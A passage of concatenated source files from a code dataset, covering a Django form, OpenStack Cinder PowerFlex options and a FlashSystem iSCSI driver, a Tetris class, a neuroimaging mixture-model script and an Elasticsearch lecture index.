None\n\n","repo_name":"npricejones/tagspace","sub_path":"tagspace/clusters/clusterfind.py","file_name":"clusterfind.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24794250855","text":"from django import forms\n\nfrom .models import Course\n\n\nclass CourseForm(forms.ModelForm):\n title = forms.CharField(label='', widget=forms.TextInput(attrs={\n \"placeholder\": \"Your title\"\n }))\n description = forms.CharField(required=False,widget=forms.Textarea(attrs={\n \"placeholder\": \"Your description\",\n \"rows\": 20,\n \"cols\": 100,\n }))\n\n class Meta:\n model = Course\n fields = [\n 'title',\n 'description',\n 'price',\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n if \"CFE\" not in title:\n raise forms.ValidationError(\"This is not a valid title (must contain CFE)\")\n\n return title\n\n\nclass RawCourseForm(forms.Form):\n title = forms.CharField()\n description = forms.CharField()\n price = forms.DecimalField()\n","repo_name":"igorbragaia/django-quickstart","sub_path":"src/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9582690975","text":"from oslo_config import cfg\n\n# deprecated options\nVXFLEXOS_REST_SERVER_PORT = \"vxflexos_rest_server_port\"\nVXFLEXOS_ROUND_VOLUME_CAPACITY = \"vxflexos_round_volume_capacity\"\nVXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION = \"vxflexos_unmap_volume_before_deletion\"\nVXFLEXOS_STORAGE_POOLS = \"vxflexos_storage_pools\"\nVXFLEXOS_SERVER_API_VERSION = \"vxflexos_server_api_version\"\nVXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO = \"vxflexos_max_over_subscription_ratio\"\nVXFLEXOS_ALLOW_NON_PADDED_VOLUMES = \"vxflexos_allow_non_padded_volumes\"\nVXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD = (\n \"vxflexos_allow_migration_during_rebuild\")\n\n# actual options\nPOWERFLEX_REST_SERVER_PORT = \"powerflex_rest_server_port\"\nPOWERFLEX_ROUND_VOLUME_CAPACITY = \"powerflex_round_volume_capacity\"\nPOWERFLEX_UNMAP_VOLUME_BEFORE_DELETION = (\n \"powerflex_unmap_volume_before_deletion\")\nPOWERFLEX_STORAGE_POOLS = \"powerflex_storage_pools\"\nPOWERFLEX_SERVER_API_VERSION = \"powerflex_server_api_version\"\nPOWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO = \"powerflex_max_over_subscription_ratio\"\nPOWERFLEX_ALLOW_NON_PADDED_VOLUMES = \"powerflex_allow_non_padded_volumes\"\nPOWERFLEX_ALLOW_MIGRATION_DURING_REBUILD = (\n \"powerflex_allow_migration_during_rebuild\")\n\ndeprecated_opts = [\n cfg.PortOpt(VXFLEXOS_REST_SERVER_PORT,\n default=443,\n help='renamed to %s.' %\n POWERFLEX_REST_SERVER_PORT,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_REST_SERVER_PORT),\n cfg.BoolOpt(VXFLEXOS_ROUND_VOLUME_CAPACITY,\n default=True,\n help='renamed to %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY),\n cfg.BoolOpt(VXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ROUND_VOLUME_CAPACITY),\n cfg.StrOpt(VXFLEXOS_STORAGE_POOLS,\n help='renamed to %s.' %\n POWERFLEX_STORAGE_POOLS,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_STORAGE_POOLS),\n cfg.StrOpt(VXFLEXOS_SERVER_API_VERSION,\n help='renamed to %s.' %\n POWERFLEX_SERVER_API_VERSION,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_SERVER_API_VERSION),\n cfg.FloatOpt(VXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO,\n # This option exists to provide a default value for the\n # PowerFlex driver which is different than the global default.\n default=10.0,\n help='renamed to %s.' %\n POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO),\n cfg.BoolOpt(VXFLEXOS_ALLOW_NON_PADDED_VOLUMES,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ALLOW_NON_PADDED_VOLUMES,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ALLOW_NON_PADDED_VOLUMES),\n cfg.BoolOpt(VXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD,\n default=False,\n help='renamed to %s.' %\n POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD,\n deprecated_for_removal=True,\n deprecated_reason='Replaced by %s.' %\n POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD),\n]\n\nactual_opts = [\n cfg.PortOpt(POWERFLEX_REST_SERVER_PORT,\n default=443,\n help='Gateway REST server port.',\n deprecated_name=VXFLEXOS_REST_SERVER_PORT),\n cfg.BoolOpt(POWERFLEX_ROUND_VOLUME_CAPACITY,\n default=True,\n help='Round volume sizes up to 8GB boundaries. '\n 'PowerFlex/VxFlex OS requires volumes to be sized '\n 'in multiples of 8GB. If set to False, volume '\n 'creation will fail for volumes not sized properly',\n deprecated_name=VXFLEXOS_ROUND_VOLUME_CAPACITY\n ),\n cfg.BoolOpt(POWERFLEX_UNMAP_VOLUME_BEFORE_DELETION,\n default=False,\n help='Unmap volumes before deletion.',\n deprecated_name=VXFLEXOS_UNMAP_VOLUME_BEFORE_DELETION),\n cfg.StrOpt(POWERFLEX_STORAGE_POOLS,\n help='Storage Pools. Comma separated list of storage '\n 'pools used to provide volumes. Each pool should '\n 'be specified as a '\n 'protection_domain_name:storage_pool_name value',\n deprecated_name=VXFLEXOS_STORAGE_POOLS),\n cfg.StrOpt(POWERFLEX_SERVER_API_VERSION,\n help='PowerFlex/ScaleIO API version. This value should be '\n 'left as the default value unless otherwise instructed '\n 'by technical support.',\n deprecated_name=VXFLEXOS_SERVER_API_VERSION),\n cfg.FloatOpt(POWERFLEX_MAX_OVER_SUBSCRIPTION_RATIO,\n # This option exists to provide a default value for the\n # PowerFlex driver which is different than the global default.\n default=10.0,\n help='max_over_subscription_ratio setting for the driver. '\n 'Maximum value allowed is 10.0.',\n deprecated_name=VXFLEXOS_MAX_OVER_SUBSCRIPTION_RATIO),\n cfg.BoolOpt(POWERFLEX_ALLOW_NON_PADDED_VOLUMES,\n default=False,\n help='Allow volumes to be created in Storage Pools '\n 'when zero padding is disabled. This option should '\n 'not be enabled if multiple tenants will utilize '\n 'volumes from a shared Storage Pool.',\n deprecated_name=VXFLEXOS_ALLOW_NON_PADDED_VOLUMES),\n cfg.BoolOpt(POWERFLEX_ALLOW_MIGRATION_DURING_REBUILD,\n default=False,\n help='Allow volume migration during rebuild.',\n deprecated_name=VXFLEXOS_ALLOW_MIGRATION_DURING_REBUILD),\n]\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/dell_emc/powerflex/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"9582968045","text":"import random\nimport threading\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder import interface\nfrom cinder import utils\nfrom cinder.volume import configuration as conf\nfrom cinder.volume.drivers.ibm import flashsystem_common as fscommon\nfrom cinder.volume.drivers.san import san\n\nLOG = logging.getLogger(__name__)\n\nflashsystem_iscsi_opts = [\n cfg.IntOpt('flashsystem_iscsi_portid',\n default=0,\n help='Default iSCSI Port ID of FlashSystem. '\n '(Default port is 0.)')\n]\n\nCONF = cfg.CONF\nCONF.register_opts(flashsystem_iscsi_opts, group=conf.SHARED_CONF_GROUP)\n\n\n@interface.volumedriver\nclass FlashSystemISCSIDriver(fscommon.FlashSystemDriver):\n \"\"\"IBM FlashSystem iSCSI volume driver.\n\n Version history:\n\n .. code-block:: none\n\n 1.0.0 - Initial driver\n 1.0.1 - Code clean up\n 1.0.2 - Add lock into vdisk map/unmap, connection\n initialize/terminate\n 1.0.3 - Initial driver for iSCSI\n 1.0.4 - Split Flashsystem driver into common and FC\n 1.0.5 - Report capability of volume multiattach\n 1.0.6 - Fix bug #1469581, add I/T mapping check in\n terminate_connection\n 1.0.7 - Fix bug #1505477, add host name check in\n _find_host_exhaustive for FC\n 1.0.8 - Fix bug #1572743, multi-attach attribute\n should not be hardcoded, only in iSCSI\n 1.0.9 - Fix bug #1570574, Cleanup host resource\n leaking, changes only in iSCSI\n 1.0.10 - Fix bug #1585085, add host name check in\n _find_host_exhaustive for iSCSI\n 1.0.11 - Update driver to use ABC metaclasses\n 1.0.12 - Update driver to support Manage/Unmanage\n existing volume\n \"\"\"\n\n VERSION = \"1.0.12\"\n\n # ThirdPartySystems wiki page\n CI_WIKI_NAME = \"IBM_STORAGE_CI\"\n\n def __init__(self, *args, **kwargs):\n super(FlashSystemISCSIDriver, self).__init__(*args, **kwargs)\n self.configuration.append_config_values(fscommon.flashsystem_opts)\n self.configuration.append_config_values(flashsystem_iscsi_opts)\n self.configuration.append_config_values(san.san_opts)\n\n def _check_vdisk_params(self, params):\n # Check that the requested protocol is enabled\n if not params['protocol'] in self._protocol:\n msg = (_(\"'%(prot)s' is invalid for \"\n \"flashsystem_connection_protocol \"\n \"in config file. valid value(s) are \"\n \"%(enabled)s.\")\n % {'prot': params['protocol'],\n 'enabled': self._protocol})\n raise exception.InvalidInput(reason=msg)\n\n # Check if iscsi_ip is set when protocol is iSCSI\n if params['protocol'] == 'iSCSI' and params['iscsi_ip'] == 'None':\n msg = _(\"target_ip_address must be set in config file when \"\n \"using protocol 'iSCSI'.\")\n raise exception.InvalidInput(reason=msg)\n\n def _create_host(self, connector):\n \"\"\"Create a new host on the storage system.\n\n We create a host and associate it with the given connection\n information.\n \"\"\"\n\n LOG.debug('enter: _create_host: host %s.', connector['host'])\n\n rand_id = str(random.randint(0, 99999999)).zfill(8)\n host_name = '%s-%s' % (self._connector_to_hostname_prefix(connector),\n rand_id)\n\n ports = []\n\n if 'iSCSI' == self._protocol and 'initiator' in connector:\n ports.append('-iscsiname %s' % connector['initiator'])\n\n self._driver_assert(ports,\n (_('_create_host: No connector ports.')))\n port1 = ports.pop(0)\n arg_name, arg_val = port1.split()\n ssh_cmd = ['svctask', 'mkhost', '-force', arg_name, arg_val, '-name',\n '\"%s\"' % host_name]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return('successfully created' in out,\n '_create_host', ssh_cmd, out, err)\n\n for port in ports:\n arg_name, arg_val = port.split()\n ssh_cmd = ['svctask', 'addhostport', '-force',\n arg_name, arg_val, host_name]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return(\n (not out.strip()),\n '_create_host', ssh_cmd, out, err)\n\n LOG.debug(\n 'leave: _create_host: host %(host)s - %(host_name)s.',\n {'host': connector['host'], 'host_name': host_name})\n\n return host_name\n\n def _find_host_exhaustive(self, connector, hosts):\n LOG.debug('enter: _find_host_exhaustive hosts: %s.', hosts)\n hname = connector['host']\n hnames = [ihost[0:ihost.rfind('-')] for ihost in hosts]\n if hname in hnames:\n host = hosts[hnames.index(hname)]\n ssh_cmd = ['svcinfo', 'lshost', '-delim', '!', host]\n out, err = self._ssh(ssh_cmd)\n self._assert_ssh_return(\n out.strip(),\n '_find_host_exhaustive', ssh_cmd, out, err)\n for attr_line in out.split('\\n'):\n attr_name, foo, attr_val = attr_line.partition('!')\n if (attr_name == 'iscsi_name' and\n 'initiator' in connector and\n attr_val == connector['initiator']):\n LOG.debug(\n 'leave: _find_host_exhaustive connector: %s.',\n connector)\n return host\n else:\n LOG.warning('Host %(host)s was not found on backend storage.',\n {'host': hname})\n return None\n\n def _get_vdisk_map_properties(\n self, connector, lun_id, vdisk_name, vdisk_id, vdisk_params):\n \"\"\"Get the map properties of vdisk.\"\"\"\n\n LOG.debug(\n 'enter: _get_vdisk_map_properties: vdisk '\n '%(vdisk_name)s.', {'vdisk_name': vdisk_name})\n\n preferred_node = '0'\n IO_group = '0'\n\n # Get preferred node and other nodes in I/O group\n preferred_node_entry = None\n io_group_nodes = []\n for k, node in self._storage_nodes.items():\n if vdisk_params['protocol'] != node['protocol']:\n continue\n if node['id'] == preferred_node:\n preferred_node_entry = node\n if node['IO_group'] == IO_group:\n io_group_nodes.append(node)\n\n if not io_group_nodes:\n msg = (_('No node found in I/O group %(gid)s for volume %(vol)s.')\n % {'gid': IO_group, 'vol': vdisk_name})\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if not preferred_node_entry:\n # Get 1st node in I/O group\n preferred_node_entry = io_group_nodes[0]\n LOG.warning('_get_vdisk_map_properties: Did not find a '\n 'preferred node for vdisk %s.', vdisk_name)\n properties = {\n 'target_discovered': False,\n 'target_lun': lun_id,\n 'volume_id': vdisk_id,\n }\n\n type_str = 'iscsi'\n if preferred_node_entry['ipv4']:\n ipaddr = preferred_node_entry['ipv4'][0]\n else:\n ipaddr = preferred_node_entry['ipv6'][0]\n iscsi_port = self.configuration.target_port\n properties['target_portal'] = '%s:%s' % (ipaddr, iscsi_port)\n properties['target_iqn'] = preferred_node_entry['iscsi_name']\n\n LOG.debug(\n 'leave: _get_vdisk_map_properties: vdisk '\n '%(vdisk_name)s.', {'vdisk_name': vdisk_name})\n\n return {'driver_volume_type': type_str, 'data': properties}\n\n @utils.synchronized('flashsystem-init-conn', external=True)\n def initialize_connection(self, volume, connector):\n \"\"\"Perform work so that an iSCSI connection can be made.\n\n To be able to create an iSCSI connection from a given host to a\n volume, we must:\n 1. Translate the given iSCSI name to a host name\n 2. Create new host on the storage system if it does not yet exist\n 3. Map the volume to the host if it is not already done\n 4. Return the connection information for relevant nodes (in the\n proper I/O group)\n\n \"\"\"\n\n LOG.debug(\n 'enter: initialize_connection: volume %(vol)s with '\n 'connector %(conn)s.', {'vol': volume, 'conn': connector})\n\n vdisk_name = volume['name']\n vdisk_id = volume['id']\n vdisk_params = self._get_vdisk_params(volume['volume_type_id'])\n\n self._wait_vdisk_copy_completed(vdisk_name)\n\n self._driver_assert(\n self._is_vdisk_defined(vdisk_name),\n (_('vdisk %s is not defined.')\n % vdisk_name))\n\n lun_id = self._map_vdisk_to_host(vdisk_name, connector)\n\n properties = {}\n try:\n properties = self._get_vdisk_map_properties(\n connector, lun_id, vdisk_name, vdisk_id, vdisk_params)\n except exception.VolumeBackendAPIException:\n with excutils.save_and_reraise_exception():\n self.terminate_connection(volume, connector)\n LOG.error('Failed to collect return properties for '\n 'volume %(vol)s and connector %(conn)s.',\n {'vol': volume, 'conn': connector})\n\n LOG.debug(\n 'leave: initialize_connection:\\n volume: %(vol)s\\n connector '\n '%(conn)s\\n properties: %(prop)s.',\n {'vol': volume,\n 'conn': connector,\n 'prop': properties})\n\n return properties\n\n @utils.synchronized('flashsystem-term-conn', external=True)\n def terminate_connection(self, volume, connector, **kwargs):\n \"\"\"Cleanup after connection has been terminated.\n\n When we clean up a terminated connection between a given connector\n and volume, we:\n 1. Translate the given connector to a host name\n 2. Remove the volume-to-host mapping if it exists\n 3. Delete the host if it has no more mappings (hosts are created\n automatically by this driver when mappings are created)\n \"\"\"\n LOG.debug(\n 'enter: terminate_connection: volume %(vol)s with '\n 'connector %(conn)s.',\n {'vol': volume, 'conn': connector})\n\n vdisk_name = volume['name']\n self._wait_vdisk_copy_completed(vdisk_name)\n host_name = self._unmap_vdisk_from_host(vdisk_name, connector)\n # checking if host_name none, if not then, check if the host has\n # any mappings, if not the host gets deleted.\n if host_name:\n if not self._get_hostvdisk_mappings(host_name):\n self._delete_host(host_name)\n\n LOG.debug(\n 'leave: terminate_connection: volume %(vol)s with '\n 'connector %(conn)s.', {'vol': volume, 'conn': connector})\n\n return {'driver_volume_type': 'iscsi'}\n\n def _get_iscsi_ip_addrs(self):\n \"\"\"get ip address of iSCSI interface.\"\"\"\n\n LOG.debug('enter: _get_iscsi_ip_addrs')\n\n cmd = ['svcinfo', 'lsportip']\n generator = self._port_conf_generator(cmd)\n header = next(generator, None)\n if not header:\n return\n\n for key in self._storage_nodes:\n if self._storage_nodes[key]['config_node'] == 'yes':\n node = self._storage_nodes[key]\n break\n\n if node is None:\n msg = _('No config node found.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n for port_data in generator:\n try:\n port_ipv4 = port_data['IP_address']\n port_ipv6 = port_data['IP_address_6']\n state = port_data['state']\n speed = port_data['speed']\n except KeyError:\n self._handle_keyerror('lsportip', header)\n if port_ipv4 == self.configuration.target_ip_address and (\n port_data['id'] == (\n str(self.configuration.flashsystem_iscsi_portid))):\n if state not in ('configured', 'online'):\n msg = (_('State of node is wrong. Current state is %s.')\n % state)\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if state in ('configured', 'online') and speed != 'NONE':\n if port_ipv4:\n node['ipv4'].append(port_ipv4)\n if port_ipv6:\n node['ipv6'].append(port_ipv6)\n break\n if not (len(node['ipv4']) or len(node['ipv6'])):\n msg = _('No ip address found.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n LOG.debug('leave: _get_iscsi_ip_addrs')\n\n def do_setup(self, ctxt):\n \"\"\"Check that we have all configuration details from the storage.\"\"\"\n\n LOG.debug('enter: do_setup')\n\n self._context = ctxt\n\n # Get data of configured node\n self._get_node_data()\n\n # Get the iSCSI IP addresses of the FlashSystem nodes\n self._get_iscsi_ip_addrs()\n\n for k, node in self._storage_nodes.items():\n if self.configuration.flashsystem_connection_protocol == 'iSCSI':\n if (len(node['ipv4']) or len(node['ipv6']) and\n len(node['iscsi_name'])):\n node['protocol'] = 'iSCSI'\n\n self._protocol = 'iSCSI'\n\n # Set for vdisk synchronization\n self._vdisk_copy_in_progress = set()\n self._vdisk_copy_lock = threading.Lock()\n self._check_lock_interval = 5\n\n LOG.debug('leave: do_setup')\n\n def _build_default_params(self):\n protocol = self.configuration.flashsystem_connection_protocol\n if protocol.lower() == 'iscsi':\n protocol = 'iSCSI'\n return {\n 'protocol': protocol,\n 'iscsi_ip': self.configuration.target_ip_address,\n 'iscsi_port': self.configuration.target_port,\n 'iscsi_ported': self.configuration.flashsystem_iscsi_portid,\n }\n\n def validate_connector(self, connector):\n \"\"\"Check connector for enabled protocol.\"\"\"\n valid = False\n if 'iSCSI' == self._protocol and 'initiator' in connector:\n valid = True\n if not valid:\n LOG.error('The connector does not contain the '\n 'required information: initiator is missing')\n raise exception.InvalidConnectorException(missing=(\n 'initiator'))\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/ibm/flashsystem_iscsi.py","file_name":"flashsystem_iscsi.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"72773890771","text":"from tetris import *\n\nclass CTetris((Tetris)):\n\n def overlapped(self):\n shape = self.currBlk.get_array()\n block = self.tempBlk.get_array()\n \n for y in range(len(shape)):\n for x in range(len(shape[y])):\n if shape[y][x] != 0 and shape[y][x] != block[y][x]:\n return True\n return False\n\n def accept(self, key):\n self.state = TetrisState.Running\n\n if key >= '0' and key <= '6':\n if self.justStarted == False:\n self.deleteFullLines()\n self.iScreen = Matrix(self.oScreen)\n self.idxBlockType = int(key)\n self.idxBlockDegree = 0\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n self.top = 0\n self.left = Tetris.iScreenDw + self.iScreenDx//2 - self.currBlk.get_dx()//2\n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n self.justStarted = False\n print()\n\n if self.overlapped():\n self.state = TetrisState.Finished\n self.oScreen = Matrix(self.iScreen)\n self.oScreen.paste(self.tempBlk, self.top, self.left)\n return self.state\n elif key == 'q':\n pass\n elif key == 'a': # move left\n self.left -= 1\n elif key == 'd': # move right\n self.left += 1\n elif key == 's': # move down\n self.top += 1\n elif key == 'w': # rotate the block clockwise\n self.idxBlockDegree = (self.idxBlockDegree + 1) % Tetris.nBlockDegrees\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n elif key == ' ': # drop the block\n while not self.overlapped(): \n self.top += 1\n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n else:\n print('Wrong key!!!')\n \n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n\n if self.overlapped(): ## 벽 충돌시 undo 수행\n if key == 'a': # undo: move right\n self.left += 1\n elif key == 'd': # undo: move left\n self.left -= 1\n elif key == 's': # undo: move up\n self.top -= 1\n self.state = TetrisState.NewBlock\n elif key == 'w': # undo: rotate the block counter-clockwise\n self.idxBlockDegree = (self.idxBlockDegree - 1) % Tetris.nBlockDegrees\n self.currBlk = Tetris.setOfBlockObjects[self.idxBlockType][self.idxBlockDegree]\n elif key == ' ': # undo: move up\n self.top -= 1\n self.state = TetrisState.NewBlock\n \n self.tempBlk = self.iScreen.clip(self.top, self.left, self.top+self.currBlk.get_dy(), self.left+self.currBlk.get_dx())\n self.tempBlk = self.tempBlk + self.currBlk\n\n self.oScreen = Matrix(self.iScreen)\n self.oScreen.paste(self.tempBlk, self.top, self.left)\n\n return self.state\n\n def deleteFullLines(self):\n array = self.oScreen.get_array()\n \n for y in range(self.oScreen.get_dy()-CTetris.iScreenDw-1, 0, -1):\n for x in range(CTetris.iScreenDw, self.oScreen.get_dx()-CTetris.iScreenDw):\n if array[y][x] == 0:\n break\n else:\n for line in range(y, 0, -1):\n array[line] = array[line-1][ : ]\n for x in range(CTetris.iScreenDw, self.oScreen.get_dx()-CTetris.iScreenDw):\n array[0][x] = 0\n self.oScreen = Matrix(array)\n return self.deleteFullLines()\n\n return\n\n\n### end of class CTetris():\n","repo_name":"20234037/sweng2021","sub_path":"pytet_v0.4/ctetris.py","file_name":"ctetris.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31958831752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 14:03:13 2017\n@author: allera\n\"\"\"\n\n\nimport sys\nimport os\nimport numpy as np\nimport nibabel as nib\nimport time\n\n\n#Add the toolbox to path\ntoolbox_path = \"/Users/alblle/allera_version_controlled_code/One_Dim_Mixture_Models/python/code\"\nsys.path.append(os.path.join(os.path.abspath(toolbox_path))) \nfrom Mixture_Model_1Dim import Mixture_Model_1Dim\nInferences_possibilities=['Method of moments','Maximum Likelihood','Variational Bayes'] \n \n\n\ndata_path='/Users/alblle/Dropbox/POSTDOC/MYPAPERS/OHBM_journal_2020_mix_models_paper/new_code/Raimon_templates/Raipru_11_ICs_2mm.nii.gz' \n\n\n\n#wd=os.getcwd()\n#completeName = os.path.join(wd, 'Results', \"OUTPUT_IMAGENAME\") #name of directory to save results\"\n#completeName = \"OUTDIR\"\n\n#os.mkdir(completeName)\nimg = nib.load(data_path)\ndata = img.get_data()\n\norigsize=data.shape\nIC=np.reshape(data,[data.shape[0]* data.shape[1]* data.shape[2],data.shape[3]], \"F\" )\nnumVoxels=IC.shape[0]\nnumICs=IC.shape[1]\n\n\nN_models=2 #GGG, GII\nN_Inference_pos=len(Inferences_possibilities)\n\n\n\nMixProp=np.zeros([numICs,N_models,N_Inference_pos,3]) \nCOST=np.zeros([numICs,N_models,N_Inference_pos]);# 6 models\nThreshold=np.zeros([numICs,N_models,N_Inference_pos,2]);# 6 models, 2 thresholds per model\nIts=np.zeros([numICs,N_models,N_Inference_pos])\n\n\n#mixture options\ninit_params=[0,1,5,2,-5,2]\n\nmaxits=500\ntol=0.00000001\n\n\n#basis_dict={MixProp}\n#Results={'Gauss_Gamma':}\nif 1:\n\n for icnumber in range (0,numICs): \n myIC=IC[:,icnumber]\n x=np.copy(myIC)\n \n \n NoBrainVoxels=np.argwhere(x==0)\n BrainVoxels=np.argwhere(x!=0)\n #remove zero voxels from x\n all_x=x;#all voxels\n PICAMAP=np.zeros(all_x.shape[0])\n x=x[BrainVoxels]#maxed voxels\n x=np.squeeze(np.divide(x-x.mean(),x.std()))\n \n \n \n # Gauss Gamma-Gamma\n Number_of_Components=3\n init_pi=np.divide(np.ones(Number_of_Components),Number_of_Components)\n Components_Model_types=[['Gauss','Gamma','-Gamma'],['Gauss','InvGamma','-InvGamma']] #Each component can be Gauss, Gamma, InvGamma, -Gamma, -InvGamma\n \n for dist_type in range(N_models):\n \n Components_Model=Components_Model_types[dist_type]\n \n for inference_type in range(N_Inference_pos):\n \n Inference =Inferences_possibilities[inference_type]\n \n opts={'Inference':Inference,'Number_of_Components':Number_of_Components,'Components_Model':Components_Model,\n 'init_params':init_params,'maxits':maxits,'tol':tol,'init_pi':init_pi}\n \n t = time.time()\n Model = Mixture_Model_1Dim(x, opts)\n \n \n COST[icnumber,dist_type,inference_type] = time.time() - t\n MixProp[icnumber,dist_type,inference_type,:]= Model['Mixing Prop.']\n Its[icnumber,dist_type,inference_type]=Model['its']\n \n resp=np.squeeze(np.asarray(Model['Final responsibilities']))\n qq=resp[0,:]\n qq[qq>0.5]=1\n qq[resp[1,:]>0.5]=2\n if np.sum(qq==2)>0:\n Threshold[icnumber,dist_type,inference_type,0]=x[qq==2].min()\n else:\n Threshold[icnumber,dist_type,inference_type,0]=x.max()\n \n if Number_of_Components==3:\n qq[resp[2,:]>0.5]=3\n if np.sum(qq==3)>0:\n Threshold[icnumber,dist_type,inference_type,1]=x[qq==3].max()\n else:\n Threshold[icnumber,dist_type,inference_type,1]=x.min()\n \n \n \n print(icnumber)\n print(Components_Model)\n print(Inference)\n print(COST[icnumber,dist_type,inference_type])\n print(MixProp[icnumber,dist_type,inference_type,:])\n print(Its[icnumber,dist_type,inference_type])\n #print(Threshold[icnumber,dist_type,inference_type,:])\n \n #\tfind classifiers threshodls\n # ng=np.where(src1['q'] ==2);\n # ps=np.where(src1['q'] ==1);\n # if np.size(ps)!=0:\n # Threshold[icnumber][0][0]=np.min(x[ps])\n # if np.size(ng)!=0:\n # Threshold[icnumber][0][1]=np.max(x[ng])\n \n \nfor dist_type in range(N_models):\n \n \n for inference_type in range(N_Inference_pos):\n \n print(COST[:,dist_type,inference_type]) \n print(MixProp[:,dist_type,inference_type,:])\n\nnp.mean(COST,0)\nnp.mean(MixProp,0)\n#savedfile= os.path.join(completeName,'RESULTS.mat')\n#Results=[]\n#Results.append({'Iterations': Its, 'MixingProps' : MixProp, 'Thresholds' :Threshold, 'cost':COST})\n#sio.savemat(savedfile,{'Results':Results }) \n \n \n \n\n\n\t\n\n\n\n\n","repo_name":"allera/One_Dim_Mixture_Models","sub_path":"python/examples/Mix_Mod_RSN.py","file_name":"Mix_Mod_RSN.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25793970451","text":"from django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.registries import registry\nfrom api.models import Lecture, Author, Event, Category\n\nfrom elasticsearch_dsl import analyzer, tokenizer\n\n# for other languages\neng_analyzer = analyzer('eng_analyzer',\n tokenizer=tokenizer('trigram', 'ngram', min_gram=3, max_gram=3),\n filter=['lowercase', 'asciifolding'] # New filter added\n)\n\n@registry.register_document\nclass LectureDocument(Document):\n author = fields.ObjectField(properties={\n 'name': fields.TextField(analyzer=eng_analyzer,),\n 'views': fields.IntegerField(),\n 'id': fields.IntegerField(),\n })\n\n categories = fields.ListField(\n fields.ObjectField(properties={\n 'name': fields.TextField(),\n }))\n\n event = fields.ObjectField(properties={\n 'title': fields.TextField(analyzer=eng_analyzer,),\n 'description': fields.TextField(analyzer=eng_analyzer,),\n 'caption': fields.TextField(analyzer=eng_analyzer,),\n })\n\n title = fields.TextField(\n analyzer=eng_analyzer,\n )\n description = fields.TextField(\n analyzer=eng_analyzer,\n )\n\n class Index:\n # Name of the Elasticsearch index\n name = 'lectures'\n # See Elasticsearch Indices API reference for available settings\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n class Django:\n model = Lecture # The model associated with this Document\n\n # The fields of the model you want to be indexed in Elasticsearch\n fields = [\n #'title',\n #'description',\n 'views',\n 'published',\n 'video',\n 'thumbnail',\n 'audio',\n 'id'\n ]\n # Optional: to ensure the Car will be re-saved when Manufacturer or Ad is updated\n related_models = [Author, Event, Category]\n\n # Ignore auto updating of Elasticsearch when a model is saved\n # or deleted:\n # ignore_signals = True\n\n # Don't perform an index refresh after every update (overrides global setting):\n # auto_refresh = False\n\n # Paginate the django queryset used to populate the index with the specified size\n # (by default it uses the database driver's default setting)\n # queryset_pagination = 5000\n\n def get_queryset(self):\n \"\"\"Not mandatory but to improve performance we can select related in one sql request\"\"\"\n return super(LectureDocument, self).get_queryset().select_related(\n 'author'\n )\n\n def get_instances_from_related(self, 